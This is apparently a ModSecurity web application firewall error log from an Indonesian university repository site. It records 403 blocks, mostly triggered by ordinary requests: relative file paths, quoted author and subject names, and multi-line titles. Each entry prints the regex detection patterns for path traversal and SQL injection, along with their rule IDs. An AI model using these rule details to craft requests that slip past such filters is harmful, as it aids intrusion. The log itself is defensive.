[Mon Aug 28 11:33:39.143301 2023] [:error] [pid 41450] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:file: ../../../repository//BAB V_ RAIHAN.pdf"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/js/pdfjs/web/viewer.html"] [unique_id "ZOwjo8Co-f0AAKHqvnMAAAAG"]
[Mon Aug 28 11:33:45.412634 2023] [:error] [pid 41450] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:file: ../../../repository//LEMBAR PERNYATAAN KEASLIAN_ RAIHAN.pdf"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/js/pdfjs/web/viewer.html"] [unique_id "ZOwjqcCo-f0AAKHqvnYAAAAG"]
[Mon Aug 28 11:33:50.089086 2023] [:error] [pid 41450] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:file: ../../../repository//DAFTAR PUSTAKA_RAIHAN.pdf"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/js/pdfjs/web/viewer.html"] [unique_id "ZOwjrsCo-f0AAKHqvngAAAAG"]
[Mon Aug 28 11:42:18.527340 2023] [:error] [pid 41703] [client 47.128.23.107] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:src. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../ found within ARGS:src: ../../images/docs/Management_and_Administration_of_Higher_Education_Institutions_at_Times_of_Change.png.png"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/lib/phpthumb/phpThumb.php"] [unique_id "ZOwlqsCo-f0AAKLnPysAAAAf"]
[Mon Aug 28 11:43:11.075265 2023] [:error] [pid 41703] [client 47.128.22.75] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:subject. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:subject: \\x22FISCAL AND MONETARY POLICY IN THE EUROZONE\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/index.php"] [unique_id "ZOwl38Co-f0AAKLnPywAAAAf"]
[Mon Aug 28 11:46:56.797505 2023] [:error] [pid 41524] [client 47.128.20.250] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: \\x22DOUG FRENCH\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/index.php"] [unique_id "ZOwmwMCo-f0AAKI09pIAAAAa"]
[Mon Aug 28 12:01:33.099917 2023] [:error] [pid 42010] [client 40.77.167.49] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:file: ../../../repository//BAB 5.pdf"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/js/pdfjs/web/viewer.html"] [unique_id "ZOwqLcCo-f0AAKQa-T8AAAAB"]
[Mon Aug 28 12:07:27.737473 2023] [:error] [pid 41934] [client 47.128.30.93] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:subject. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:subject: \\x22GET, WANT, SITUATIONS\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/index.php"] [unique_id "ZOwrj8Co-f0AAKPOc7kAAAAt"]
[Mon Aug 28 12:07:27.877360 2023] [:error] [pid 41934] [client 47.128.30.93] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:subject. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:subject: \\x22GET, WANT, SITUATIONS\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/index.php"] [unique_id "ZOwrj8Co-f0AAKPOc7oAAAAt"]
[Mon Aug 28 12:09:00.481942 2023] [:error] [pid 42150] [client 47.128.22.7] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: \\x22Zahay, Debra L\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/index.php"] [unique_id "ZOwr7MCo-f0AAKSmWoYAAAAS"]
[Mon Aug 28 12:33:00.490365 2023] [:error] [pid 42709] [client 47.128.31.236] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:src. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../ found within ARGS:src: ../../images/docs/cover_An_Introduction_Potics,_State_&_Society.jpg.jpg"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/lib/phpthumb/phpThumb.php"] [unique_id "ZOwxjMCo-f0AAKbVwXsAAAAJ"]
[Mon Aug 28 12:46:59.331644 2023] [:error] [pid 42794] [client 47.128.27.24] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: \\x22R. WILLYA ACHMAD W.\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/index.php"] [unique_id "ZOw008Co-f0AAKcq2j0AAAAL"]
[Mon Aug 28 12:54:10.656235 2023] [:error] [pid 43078] [client 47.128.18.169] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: \\x22Kung, S.Y. (Sun Yuan)\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/index.php"] [unique_id "ZOw2gsCo-f0AAKhGfI4AAAAR"]
[Mon Aug 28 12:55:27.843601 2023] [:error] [pid 43124] [client 47.128.25.135] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: \\x22Febriyanti Tamara\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/index.php"] [unique_id "ZOw2z8Co-f0AAKh0g74AAAAU"]
[Mon Aug 28 12:56:34.265329 2023] [:error] [pid 43163] [client 47.128.21.93] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:subject. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:subject: \\x22Process Management\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/index.php"] [unique_id "ZOw3EsCo-f0AAKibkhIAAAAL"]
[Mon Aug 28 13:03:31.952196 2023] [:error] [pid 43251] [client 47.128.31.231] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:src. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../ found within ARGS:src: ../../images/docs/cover_Software_Engineering_and_Development.PNG.PNG"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/lib/phpthumb/phpThumb.php"] [unique_id "ZOw4s8Co-f0AAKjzRpEAAAAT"]
[Mon Aug 28 13:04:23.398470 2023] [:error] [pid 43215] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:title. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  \\x0d\\x0a\\x0d\\x0a found within ARGS:title:  \\x0d\\x0a\\x0d\\x0aPENGARUH SYSTEM REWARD DAN KOMPETENSI\\x0d\\x0aTERHADAP KINERJA KARYAWAN TETAP PADA \\x0d\\x0aPT BANK RAKYAT INDONESIA (Persero) Tbk.\\x0d\\x0aKANTOR CABANG NARIPAN BANDUNG \\x0d\\x0a\\x0d\\x0a"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/admin/modules/bibliography/index.php"] [unique_id "ZOw458Co-f0AAKjPufsAAAAN"]
[Mon Aug 28 13:04:24.010742 2023] [:error] [pid 43215] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:title. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  \\x0d\\x0a\\x0d\\x0a found within ARGS:title:  \\x0d\\x0a\\x0d\\x0aPENGARUH SYSTEM REWARD DAN KOMPETENSI\\x0d\\x0aTERHADAP KINERJA KARYAWAN TETAP PADA \\x0d\\x0aPT BANK RAKYAT INDONESIA (Persero) Tbk.\\x0d\\x0aKANTOR CABANG NARIPAN BANDUNG \\x0d\\x0a\\x0d\\x0a"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/admin/modules/bibliography/index.php"] [unique_id "ZOw458Co-f0AAKjPufwAAAAN"]
[Mon Aug 28 13:04:24.227266 2023] [:error] [pid 43215] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:title. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  \\x0d\\x0a\\x0d\\x0a found within ARGS:title:  \\x0d\\x0a\\x0d\\x0aPENGARUH SYSTEM REWARD DAN KOMPETENSI\\x0d\\x0aTERHADAP KINERJA KARYAWAN TETAP PADA \\x0d\\x0aPT BANK RAKYAT INDONESIA (Persero) Tbk.\\x0d\\x0aKANTOR CABANG NARIPAN BANDUNG \\x0d\\x0a\\x0d\\x0a"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/admin/modules/bibliography/index.php"] [unique_id "ZOw46MCo-f0AAKjPuf0AAAAN"]
[Mon Aug 28 13:04:24.416507 2023] [:error] [pid 43215] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:title. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  \\x0d\\x0a\\x0d\\x0a found within ARGS:title:  \\x0d\\x0a\\x0d\\x0aPENGARUH SYSTEM REWARD DAN KOMPETENSI\\x0d\\x0aTERHADAP KINERJA KARYAWAN TETAP PADA \\x0d\\x0aPT BANK RAKYAT INDONESIA (Persero) Tbk.\\x0d\\x0aKANTOR CABANG NARIPAN BANDUNG \\x0d\\x0a\\x0d\\x0a"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/admin/modules/bibliography/index.php"] [unique_id "ZOw46MCo-f0AAKjPuf4AAAAN"]
[Mon Aug 28 13:04:24.784078 2023] [:error] [pid 43215] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:title. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  \\x0d\\x0a\\x0d\\x0a found within ARGS:title:  \\x0d\\x0a\\x0d\\x0aPENGARUH SYSTEM REWARD DAN KOMPETENSI\\x0d\\x0aTERHADAP KINERJA KARYAWAN TETAP PADA \\x0d\\x0aPT BANK RAKYAT INDONESIA (Persero) Tbk.\\x0d\\x0aKANTOR CABANG NARIPAN BANDUNG \\x0d\\x0a\\x0d\\x0a"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/admin/modules/bibliography/index.php"] [unique_id "ZOw46MCo-f0AAKjPuf8AAAAN"]
[Mon Aug 28 13:04:24.989258 2023] [:error] [pid 43215] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:title. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  \\x0d\\x0a\\x0d\\x0a found within ARGS:title:  \\x0d\\x0a\\x0d\\x0aPENGARUH SYSTEM REWARD DAN KOMPETENSI\\x0d\\x0aTERHADAP KINERJA KARYAWAN TETAP PADA \\x0d\\x0aPT BANK RAKYAT INDONESIA (Persero) Tbk.\\x0d\\x0aKANTOR CABANG NARIPAN BANDUNG \\x0d\\x0a\\x0d\\x0a"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/admin/modules/bibliography/index.php"] [unique_id "ZOw46MCo-f0AAKjPugAAAAAN"]
[Mon Aug 28 13:04:25.177967 2023] [:error] [pid 43215] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:title. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  \\x0d\\x0a\\x0d\\x0a found within ARGS:title:  \\x0d\\x0a\\x0d\\x0aPENGARUH SYSTEM REWARD DAN KOMPETENSI\\x0d\\x0aTERHADAP KINERJA KARYAWAN TETAP PADA \\x0d\\x0aPT BANK RAKYAT INDONESIA (Persero) Tbk.\\x0d\\x0aKANTOR CABANG NARIPAN BANDUNG \\x0d\\x0a\\x0d\\x0a"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/admin/modules/bibliography/index.php"] [unique_id "ZOw46cCo-f0AAKjPugEAAAAN"]
[Mon Aug 28 13:04:25.390163 2023] [:error] [pid 43215] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:title. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  \\x0d\\x0a\\x0d\\x0a found within ARGS:title:  \\x0d\\x0a\\x0d\\x0aPENGARUH SYSTEM REWARD DAN KOMPETENSI\\x0d\\x0aTERHADAP KINERJA KARYAWAN TETAP PADA \\x0d\\x0aPT BANK RAKYAT INDONESIA (Persero) Tbk.\\x0d\\x0aKANTOR CABANG NARIPAN BANDUNG \\x0d\\x0a\\x0d\\x0a"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/admin/modules/bibliography/index.php"] [unique_id "ZOw46cCo-f0AAKjPugIAAAAN"]
[Mon Aug 28 13:04:25.604069 2023] [:error] [pid 43215] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:title. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  \\x0d\\x0a\\x0d\\x0a found within ARGS:title:  \\x0d\\x0a\\x0d\\x0aPENGARUH SYSTEM REWARD DAN KOMPETENSI\\x0d\\x0aTERHADAP KINERJA KARYAWAN TETAP PADA \\x0d\\x0aPT BANK RAKYAT INDONESIA (Persero) Tbk.\\x0d\\x0aKANTOR CABANG NARIPAN BANDUNG \\x0d\\x0a\\x0d\\x0a"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/admin/modules/bibliography/index.php"] [unique_id "ZOw46cCo-f0AAKjPugMAAAAN"]
[Mon Aug 28 13:04:31.561176 2023] [:error] [pid 43303] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:title. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  \\x0d\\x0a\\x0d\\x0a found within ARGS:title:  \\x0d\\x0a\\x0d\\x0aPENGARUH SYSTEM REWARD DAN KOMPETENSI\\x0d\\x0aTERHADAP KINERJA KARYAWAN TETAP PADA \\x0d\\x0aPT BANK RAKYAT INDONESIA (Persero) Tbk.\\x0d\\x0aKANTOR CABANG NARIPAN BANDUNG \\x0d\\x0a\\x0d\\x0a"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/admin/modules/bibliography/index.php"] [unique_id "ZOw478Co-f0AAKknVNcAAAAH"]
[Mon Aug 28 13:04:31.997750 2023] [:error] [pid 43303] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:title. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  \\x0d\\x0a\\x0d\\x0a found within ARGS:title:  \\x0d\\x0a\\x0d\\x0aPENGARUH SYSTEM REWARD DAN KOMPETENSI\\x0d\\x0aTERHADAP KINERJA KARYAWAN TETAP PADA \\x0d\\x0aPT BANK RAKYAT INDONESIA (Persero) Tbk.\\x0d\\x0aKANTOR CABANG NARIPAN BANDUNG \\x0d\\x0a\\x0d\\x0a"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/admin/modules/bibliography/index.php"] [unique_id "ZOw478Co-f0AAKknVNgAAAAH"]
[Mon Aug 28 13:04:32.253462 2023] [:error] [pid 43303] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:title. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  \\x0d\\x0a\\x0d\\x0a found within ARGS:title:  \\x0d\\x0a\\x0d\\x0aPENGARUH SYSTEM REWARD DAN KOMPETENSI\\x0d\\x0aTERHADAP KINERJA KARYAWAN TETAP PADA \\x0d\\x0aPT BANK RAKYAT INDONESIA (Persero) Tbk.\\x0d\\x0aKANTOR CABANG NARIPAN BANDUNG \\x0d\\x0a\\x0d\\x0a"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/admin/modules/bibliography/index.php"] [unique_id "ZOw48MCo-f0AAKknVNkAAAAH"]
[Mon Aug 28 13:08:12.064793 2023] [:error] [pid 43306] [client 52.167.144.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:subject. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:subject: \\x22Algoritma Non Delay, Job Shop\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/index.php"] [unique_id "ZOw5zMCo-f0AAKkqO@8AAAAM"]
[Mon Aug 28 13:13:26.855066 2023] [:error] [pid 43467] [client 47.128.27.42] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: \\x22Pande, Amit\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/index.php"] [unique_id "ZOw7BsCo-f0AAKnLyw8AAAAA"]
[Mon Aug 28 13:14:37.238305 2023] [:error] [pid 43523] [client 47.128.27.173] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:src. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../ found within ARGS:src: ../../images/docs/cover_educational_technology_and_narrative.PNG.PNG"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/lib/phpthumb/phpThumb.php"] [unique_id "ZOw7TcCo-f0AAKoDxQsAAAAJ"]
